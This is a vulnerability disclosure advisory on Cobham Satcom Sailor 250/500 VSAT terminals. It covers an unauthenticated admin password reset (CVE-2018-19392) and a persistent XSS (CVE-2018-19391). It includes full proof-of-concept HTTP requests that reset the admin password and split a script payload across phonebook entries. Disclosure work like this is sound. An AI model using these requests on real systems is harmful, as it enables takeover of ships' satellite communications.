Cobham Satcom Sailor 250 / 500 VSAT Vulnerabilities

The CyberSKR Maritime Security Team recently identified multiple vulenerabilities in Cobham Satcom products, specifically the Sailor 250 / 500 VSAT systems (version <1.25).

The vendor’s response was excellent, and we were put in contact with a senior member of the company almost immediately, who was able to action the information we provided them with in a very timely manner.

Vulnerability Overview – Cobham Satcom Sailor 250 / 500

• Authentication Bypass via Un-Authenticated Password Reset
• Persistent Cross Site Scripting (XSS)

CVE-2018-19392: Sailor 250 / 500 Authentication Bypass via Unauthenticated Password Reset

It was possible for an unauthenticated user to reset a user's (including the default "admin" account's) password. This did not require prior knowledge of the user account's current password to be successful.

Example Unauthenticated Password Reset (Sailor 250/500)

Update --REDACTED-- with your target host/IP

POST /index.lua?pageID=Administration&langID=english HTTP/1.1
Host: --REDACTED--
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://--REDACTED--/index.lua?pageID=Administration&langID=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Cookie:
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

usernameAdmChange=admin&passwordAdmChange1=CyberSKR&passwordAdmChange2=CyberSKR

CVE-2018-19391: Sailor 250 / 500 Persistent XSS

A vulnerability was identified in the Cobham Satcom Sailor 250 / 500 systems where an unauthenticated threat actor could embed executable JavaScript code into the web application.

Example Persistent XSS (Request 1)

Update --REDACTED-- where necessary

POST /index.lua?pageID=Phone%20book&langID=english&phonebookOP=saveEntry&entryIndex=2&phonebookPage=1 HTTP/1.1
Host: --REDACTED--
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://--REDACTED--/index.lua?pageID=Phone%20book&langID=english&phonebookOP=edit&entryIndex=2&phonebookPage=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Cookie: tt_adm=--REDACTED--
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

name=<script>/*&number=1111111111

Example Persistent XSS (Request 2)

Update --REDACTED-- where necessary

POST /index.lua?pageID=Phone%20book&langID=english&phonebookOP=saveEntry&entryIndex=3&phonebookPage=1 HTTP/1.1
Host: --REDACTED--
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://--REDACTED--/index.lua?pageID=Phone%20book&langID=english&phonebookOP=edit&entryIndex=2&phonebookPage=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Cookie: tt_adm=--REDACTED--
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

name=*/alert(1);</script>&number=1111111111